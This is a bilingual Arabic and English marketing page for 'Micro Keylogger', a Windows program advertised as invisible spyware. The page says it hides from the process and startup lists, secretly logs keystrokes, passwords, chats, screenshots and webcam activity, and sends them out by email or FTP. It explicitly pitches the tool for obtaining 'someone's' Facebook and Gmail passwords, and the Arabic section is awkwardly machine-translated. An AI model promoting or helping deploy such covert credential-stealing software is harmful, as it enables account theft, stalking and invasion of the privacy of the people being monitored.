الصغرى كلوغر

مايكرو كلوغر--أفضل كلوغر ألفيس بوك تحميل

اتصل بنا

مايكرو كلوغر--كلوغر كلمة المرور غير مرئية

كلوغر الصغرى (وتسمى أيضا ضغطه المسجل أو المسجل لوحة المفاتيح) مرئية كلوغر لويندوز 8/7/Vista/XP التي تدير خفية في الخلفية لسجل سراً ضربات المفاتيح المطبوعة، كلمات المرور التي تم إدخالها، المواقع زار، تستخدم ملفات التطبيقات وتأخذ لقطات الأنشطة.

سيتم إرسال البيانات المسجلة إليك بالبريد الإلكتروني أو بروتوكول نقل الملفات تلقائياً وسرًا.

مايكرو كلوغر--لقطات الشاشة

مايكرو كلوغر ضغطات مفاتيح السجل
مايكرو كلوغر تسجيل المواقع
دردشات مايكرو كلوغر سجل
دردشات مايكرو كلوغر سجل

لماذا تختار "مايكرو كلوغر"؟

تسجيل لوحة المفاتيح
أفضل كلوغر تسجيل كلمة المرور

أريد أن أعرف كلمات مرور ألفيس بوك لشخص ما، Gmail كلمات المرور أو كلمات المرور لعبة أو كلمات مرور تسجيل الدخول الموقع؟ مايكرو كلوغر سجلات كافة كلمات المرور إدخال أسماء المستخدم المكتوبة، وإجابات لمسائل الأمن ومعلومات تسجيل الدخول الأخرى.

تسجيل لوحة المفاتيح
أمن إرسال التقرير لكم عن طريق البريد الإلكتروني/FTP

على عكس keyloggers الأخرى التي تحميل البيانات الخاصة المسجلة إلى موقع الويب الخاص بالمورد كلوغر، "كلوغر الجزئي" فقط بإرسال البيانات إلى البريد الإلكتروني أو بروتوكول نقل الملفات الخاصة بك. لم يحفظ مايكرو كلوغر البيانات المسجلة. البيانات الخاصة بك آمنة داخل عنصر التحكم الخاص بك.

تسجيل لوحة المفاتيح
كل شيء: تسجيل ضغطات المفاتيح، المواقع، الصور، والأحاديث، والألواح الكتابة...

مايكرو كلوغر لديه كل ميزات تسجيل الدخول الذي تريده. ضغطات مفاتيح تسجيل والتقاط الصور تمكنك من تسجيل جميع أنواع الأنشطة بما في ذلك الأحاديث وكلمات المرور، مواقع، ألعاب، كاميرا ويب النشاط، ورسائل البريد الإلكتروني المرسلة/مشاهدة وأكثر.

تسجيل لوحة المفاتيح
كلوغر غير المرئية والمخفية

نليكي keyloggers الأخرى التي لا تكون مخفية تماما، "مايكرو كلوغر" يخفي نفسه من جميع المواقع مثل سطح المكتب وقائمة ابدأ، وشريط المهام، لوحة التحكم--البرامج، قائمة عملية، قائمة بدء التشغيل Msconfig وأكثر. يعمل بصمت ولن يؤثر على أداء النظام.

تسجيل لوحة المفاتيح
سهلة لتثبيت-ح 7 * 24 دعم مباشر

فقط انقر نقراً مزدوجاً فوق وحدد اللغة المفضلة، وسوف تحصل على "مايكرو كلوغر" المثبتة وبدء تسجيل الدخول فورا. بشكل اختياري يمكنك تكوين الإعدادات لتلقي التقارير عن طريق البريد الإلكتروني. يمكنك حتى الحصول على مساعدة عن بعد مع دعمنا العيش ح 7 * 24 إذا كان لديك أي قضية.

شهادات

"Micro Keylogger is the best keylogger for PC - totally invisible, powerful features, great support, all best" -David. M

"It really works well on my computer! Thanks for helping me keep an eye on my kids' online activity and letting me know what happened to them timely so that I can protect them from potential harms." -Daniel

كلوغر آمنة ونظيفة! تبحث عن كلوغر ماك/أي فون/الروبوت؟ انقر هنا!
مايكرو كلوغر لنظام التشغيل Windows PC عشرات
4.9 من أصل 5 استناداً إلى 5254 تصنيفات.

Micro Keylogger - Invisible Password Keylogger

Micro Keylogger (also called keystroke logger or keyboard logger) is an invisible keylogger for Windows 8/7/Vista/XP that runs hidden in the background to secretly record keystrokes typed, passwords entered, websites visited, applications/files used and take screenshots of the activities.

Recorded data will be sent to you by email or FTP automatically and secretly.

Get Started

Download and Install in 2 minutes

Looking for Keylogger for Mac/iPhone/Android? Click here!

Screenshots

Micro Keylogger - Computer Spy
Micro Keylogger - Block Websites
Micro Keylogger - Send Emails
Micro Keylogger - View Reports

Why choose Micro Keylogger?

Password Logging
Best Password logging keylogger

Want to know someone's Facebook passwords, Gmail passwords, game passwords or website login passwords? Micro Keylogger records ALL of the passwords entered as well as the typed user names, answers to security questions and other login information.

Report Delivery
Securely send the report to you by Email/FTP

Unlike other keyloggers which upload the recorded private data to the website of the keylogger vendor, Micro Keylogger only sends the data to your own Email or FTP. Micro Keylogger never saves your logged data. Your data is safe within your own control.

Computer Monitoring
Everything: logging of keystrokes, websites, screenshots, chats, clipboards...

Micro Keylogger brings all the logging features you want. Keystrokes logging and Screenshots capturing enables you to record all kinds of activities including chats, passwords, websites, games, webcam activity, Emails sent/viewed and more.

Invisible Keylogger
Invisible and hidden keylogger

Unlike other keyloggers which is not totally hidden, Micro Keylogger hides itself from all the locations like Desktop, Start Menu, Task Bar, Control Panel-Programs, Process list, Msconfig startup list and more. It works silently and won't affect the system performance.

Support Center
Easy to Install - 7*24h live support

Just double click and select preferred language, you will get Micro Keylogger installed and start logging immediately. Optionally you can configure settings to receive reports by Email. You can even get remote help with our 7*24h live support if you have any issue.

Testimonials

"Micro Keylogger is the best keylogger for PC - totally invisible, powerful features, great support, all best" - David. M

"It really works well on my computer! Thanks for helping me keep an eye on my kids' online activity and letting me know what happened to them timely so that I can protect them from potential harms." - Daniel

Safe and Clean Keylogger!